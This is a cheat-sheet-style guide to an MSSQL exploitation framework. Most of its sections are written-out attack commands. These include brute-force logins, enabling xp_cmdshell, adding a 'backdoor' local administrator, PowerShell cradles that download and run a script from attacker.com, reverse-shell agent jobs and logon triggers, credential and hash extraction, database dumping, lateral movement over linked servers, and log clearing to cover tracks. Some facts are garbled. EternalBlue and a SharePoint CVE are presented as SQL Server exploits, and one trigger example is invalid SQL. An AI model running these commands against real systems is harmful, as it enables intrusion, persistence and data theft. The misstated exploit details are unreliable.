mssqlpwner

Overview

mssqlpwner is a comprehensive MSSQL exploitation and post-exploitation framework for security professionals conducting authorized penetration testing. It provides automated tools for discovering MSSQL instances, exploiting known vulnerabilities, executing queries, and establishing persistence. The tool integrates with Metasploit and supports both opportunistic and targeted attacks during authorized security assessments.

Installation

Prerequisites

# Install required packages
sudo apt-get update
sudo apt-get install python3 python3-pip git

# Install ODBC drivers for SQL Server
curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
sudo apt-add-repository https://packages.microsoft.com/ubuntu/20.04/prod
sudo apt-get install msodbcsql17 mssql-tools

# Add to PATH
export PATH="$PATH:/opt/mssql-tools/bin"

Clone Repository

# Clone mssqlpwner
git clone https://github.com/blacklanternsecurity/mssqlpwner.git
cd mssqlpwner

# Install Python dependencies
pip3 install -r requirements.txt

Docker Installation

# Build Docker image
docker build -t mssqlpwner .

# Run mssqlpwner in container
docker run -it --rm mssqlpwner

Basic Usage

Help and Information

# Display help
python3 mssqlpwner.py -h

# Show version
python3 mssqlpwner.py --version

# List available modules
python3 mssqlpwner.py --list-modules

Connection Establishment

Parameter	Description	Example
-s, --server	MSSQL server hostname/IP	-s 192.168.1.100
-u, --user	Database username	-u sa
-p, --password	Database password	-p P@ssw0rd
-P, --port	MSSQL port (default 1433)	-P 1433
-d, --database	Target database	-d master
-i, --instance	Named instance	-i SQLEXPRESS
-A, --auth	Authentication type	-A windows
-e, --encrypt	Encrypt connection	-e

Basic Connection

# Connect with SQL authentication
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password

# Connect with Windows authentication
python3 mssqlpwner.py -s sqlserver.internal -u DOMAIN\\username -p password -A windows

# Connect to named instance
python3 mssqlpwner.py -s sqlserver.internal -i SQLEXPRESS -u sa -p password

# Connection with specific database
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -d master

Discovery and Enumeration

MSSQL Instance Discovery

# Scan for MSSQL instances on network
python3 mssqlpwner.py --scan 192.168.1.0/24

# Enumerate instances on specific host
python3 mssqlpwner.py --enumerate-instances 192.168.1.100

# UDP broadcast for SQL Server instances
python3 mssqlpwner.py --udp-scan 192.168.1.0/24

# Aggressive scanning
python3 mssqlpwner.py --scan 192.168.1.0/24 --aggressive

Server Enumeration

# Get SQL Server version
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_version

# Enumerate databases
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_databases

# List tables in database
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_tables

# Get database users
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_users

# Enumerate SQL Server roles
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_roles

# Get login permissions
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_permissions

Database Enumeration

# Detailed database information
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -d master -m enum_database_info

# Find linked servers
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_linked_servers

# Enumerate triggers
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_triggers

# Find stored procedures
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_procedures

# Identify default/weak credentials
python3 mssqlpwner.py -s 192.168.1.100 -m test_default_creds

Exploitation Techniques

SQL Injection

# Basic SQL injection test
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m test_sqli

# Exploit UNION-based SQLi
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m sqli_union \
  --target-column 3 --target-table users

# Blind SQL injection
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m sqli_blind \
  --payload "' OR 1=1 --"

# Time-based blind injection
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m sqli_time \
  --delay 5

Authentication Bypass

# Dictionary attack
python3 mssqlpwner.py -s 192.168.1.100 -u sa -m bruteforce \
  --wordlist passwords.txt

# Common credentials
python3 mssqlpwner.py -s 192.168.1.100 -m common_credentials

# Null password attack
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p "" -m test_null_password

# SA account exploitation
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p sa -m test_default_sa

CVE Exploitation

# MS17-010 (EternalBlue)
python3 mssqlpwner.py -s 192.168.1.100 -m cve_2017_0010

# CVE-2019-0604 (SQL Server RCE)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m cve_2019_0604

# CVE-2020-0618 (Reporting Services)
python3 mssqlpwner.py -s 192.168.1.100 -m cve_2020_0618

# List available CVE exploits
python3 mssqlpwner.py --list-cve-exploits

Query Execution

Manual Query Execution

# Execute single query
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "SELECT @@VERSION"

# Execute from file
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  --query-file queries.sql

# Multiple queries
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "USE master; SELECT name FROM sysobjects WHERE xtype='U'"

# Interactive shell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password --shell

Common Administrative Queries

# Get SQL Server configuration
SELECT @@VERSION;
SELECT name, SERVERPROPERTY(name) AS value FROM 
  fn_serverproperty(NULL) WHERE OBJECTPROPERTY(object_id(name), 'IsProperty')=1;

# List all logins
SELECT name FROM sys.sql_logins;

# List database owners
SELECT name, suser_sname(owner_sid) as Owner FROM sys.databases;

# Find tables with sensitive data
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES 
  WHERE TABLE_NAME LIKE '%password%' OR TABLE_NAME LIKE '%credential%';

# Get connection strings
SELECT name, value FROM sys.fn_listextendedproperty(null, null, null, null, null, null, null);

Privilege Escalation

SQL Server Privilege Escalation

# Check current user privileges
python3 mssqlpwner.py -s 192.168.1.100 -u limited_user -p password \
  -m check_privileges

# Impersonate users
python3 mssqlpwner.py -s 192.168.1.100 -u limited_user -p password \
  -m impersonate --target-user "DOMAIN\\admin"

# Exploit dbowner role
python3 mssqlpwner.py -s 192.168.1.100 -u dbowner_user -p password \
  -m escalate_dbowner

# Abuse sysadmin role
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m escalate_sysadmin

System-Level Privilege Escalation

# Enable xp_cmdshell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enable_xp_cmdshell

# Execute OS commands via xp_cmdshell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m xp_cmdshell -c "whoami"

# Create local user via SQL
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "EXEC xp_cmdshell 'net user backdoor P@ssw0rd /add'"

# Add user to administrators
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "EXEC xp_cmdshell 'net localgroup administrators backdoor /add'"

Code Execution

Command Execution Methods

# xp_cmdshell (classic method)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_xpcmdshell -c "tasklist"

# OLE Automation Objects
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_ole_automation -c "powershell.exe -nop -w hidden -c 'IEX(New-Object System.Net.WebClient).DownloadString(\"http://attacker.com/shell.ps1\")'"

# CLR Assembly injection
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_clr --assembly shell.dll

# Agent job for command execution
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_agent_job -c "cmd.exe /c powershell -nop -w hidden -enc ...base64..."

Reverse Shell Creation

# Generate reverse shell payload
python3 mssqlpwner.py --generate-payload --type reverse_shell \
  --ip 192.168.1.50 --port 4444

# Execute reverse shell via SQL Server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "EXEC xp_cmdshell 'powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString(\"\"http://attacker.com/shell.ps1\"\")\"'"

# Create agent job with reverse shell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_reverse_shell_job --ip 192.168.1.50 --port 4444

Persistence Mechanisms

SQL Server Persistence

# Create backdoor login
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_backdoor_login --login backdoor --password P@ssw0rd

# Create hidden database user
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_hidden_user --database master --user hidden_admin

# Create startup procedure
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_startup_procedure --command "EXEC xp_cmdshell 'powershell -nop -w hidden -c ...'"

# Enable database auditing bypass
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m disable_auditing

Scheduled Job Persistence

# Create scheduled agent job
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_scheduled_job \
  --job-name "Windows Update" \
  --command "cmd.exe /c powershell -nop -w hidden -enc ..." \
  --schedule "Daily" \
  --time "02:00"

# Create T-SQL job for persistence
CREATE PROCEDURE sp_add_job @job_name='backdoor',
  @enabled=1;
EXEC msdb.dbo.sp_add_job @job_name='backdoor', @enabled=1;

# List SQL Agent jobs
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m list_agent_jobs

Trigger-Based Persistence

# Create logon trigger
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_logon_trigger \
  --command "EXEC xp_cmdshell 'callback.exe 192.168.1.50:4444'"

# DML trigger for persistence
CREATE TRIGGER persistence_trigger
ON master.sys.server_triggers
FOR CREATE, ALTER, DROP
AS
EXEC xp_cmdshell 'C:\\Windows\\Temp\\callback.exe';

Data Exfiltration

Database Dumping

# Dump entire database
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -d company_db -m dump_database --output company_db.sql

# Selective table export
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m dump_table --table users --output users.csv

# Dump with sensitive data detection
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m dump_sensitive_data --output sensitive.csv

Credential Extraction

# Extract SQL Server password hashes
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m extract_password_hashes --output hashes.txt

# Get Windows credential manager data
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m extract_windows_credentials

# Dump connection strings
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m extract_connection_strings --output connections.txt

File Exfiltration

# Read local files via SQL Server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m read_file --path "C:\\Windows\\System32\\drivers\\etc\\hosts"

# Write files from SQL Server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m write_file --content "malware code" --output "C:\\Windows\\Temp\\backdoor.ps1"

# Enumerate accessible file shares
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enumerate_file_shares

Lateral Movement

Linked Server Exploitation

# Enumerate linked servers
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enum_linked_servers

# Query through linked server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m query_linked_server --server "linked_server_name" \
  --query "SELECT @@VERSION"

# Execute command on linked server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_linked_server --server "remote_sql" \
  --command "EXEC xp_cmdshell 'whoami'"

# Chain exploitation through linked servers
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m linked_server_chain --target "internal_sql_server" \
  --command "CREATE LOGIN backdoor WITH PASSWORD='P@ssw0rd'"

Database Link Exploitation

# Identify database links
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enum_db_links

# Execute query on linked database
SELECT * FROM OPENQUERY(linked_server, 'SELECT @@VERSION');

# RPC to linked server
EXEC ('EXEC xp_cmdshell "whoami"') AT linked_server;

Post-Exploitation Cleanup

Log Deletion

# Clear SQL Server error logs
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m clear_error_logs

# Disable audit trails
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m disable_auditing

# Clear Windows event logs
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m clear_windows_logs

Track Covering

# Remove created logins
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m remove_backdoor_login --login backdoor

# Delete created jobs
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m remove_scheduled_jobs

# Revert xp_cmdshell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m disable_xp_cmdshell

Configuration File Usage

Create Config File

# mssqlpwner_config.yaml
targets:
  - host: 192.168.1.100
    port: 1433
    username: sa
    password: P@ssw0rd
    instance: SQLEXPRESS

  - host: sqlserver.internal
    port: 1433
    username: DOMAIN\sqlservice
    password: ServicePassword123
    auth_type: windows

modules:
  - name: enum_databases
  - name: enable_xp_cmdshell
  - name: xp_cmdshell
    command: whoami

output:
  format: csv
  file: results.csv

Run from Config

python3 mssqlpwner.py --config mssqlpwner_config.yaml --execute-all

Troubleshooting

Connection Issues

# Test connectivity
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password --test

# Verbose connection output
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -v

# Check firewall
telnet 192.168.1.100 1433

# Verify ODBC driver
odbcinst -j

Module Errors

# List available modules
python3 mssqlpwner.py --list-modules

# Run with debug output
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m module_name --debug

# Check module requirements
python3 mssqlpwner.py -m module_name --check-requirements

OPSEC Considerations

Operational Security

• Use dedicated test database for queries
• Minimize xp_cmdshell usage (monitored)
• Avoid large data transfers during business hours
• Use encrypted connections (TLS 1.2+)
• Document all actions with timestamps
• Schedule cleanup tasks in advance
• Monitor for IDS/IPS alerts
• Test in lab environment first

Detection Evasion

# Use least-privilege account
python3 mssqlpwner.py -s 192.168.1.100 -u limited_user -p password

# Randomize execution timing
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  --delay 300 --jitter 60

# Use indirect methods (linked servers, jobs)
# Instead of xp_cmdshell

# Obfuscate queries
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  --obfuscate --query "SELECT * FROM users"

References

• SQL Server Documentation: https://docs.microsoft.com/en-us/sql/
• MSSQL Injection Techniques: https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
• SQL Server Security: https://docs.microsoft.com/en-us/sql/relational-databases/security/
• mssqlpwner GitHub: https://github.com/blacklanternsecurity/mssqlpwner

Legal Notice

mssqlpwner is designed for authorized penetration testing and security assessments only. Unauthorized access to computer systems is illegal. Always obtain written authorization before testing any systems.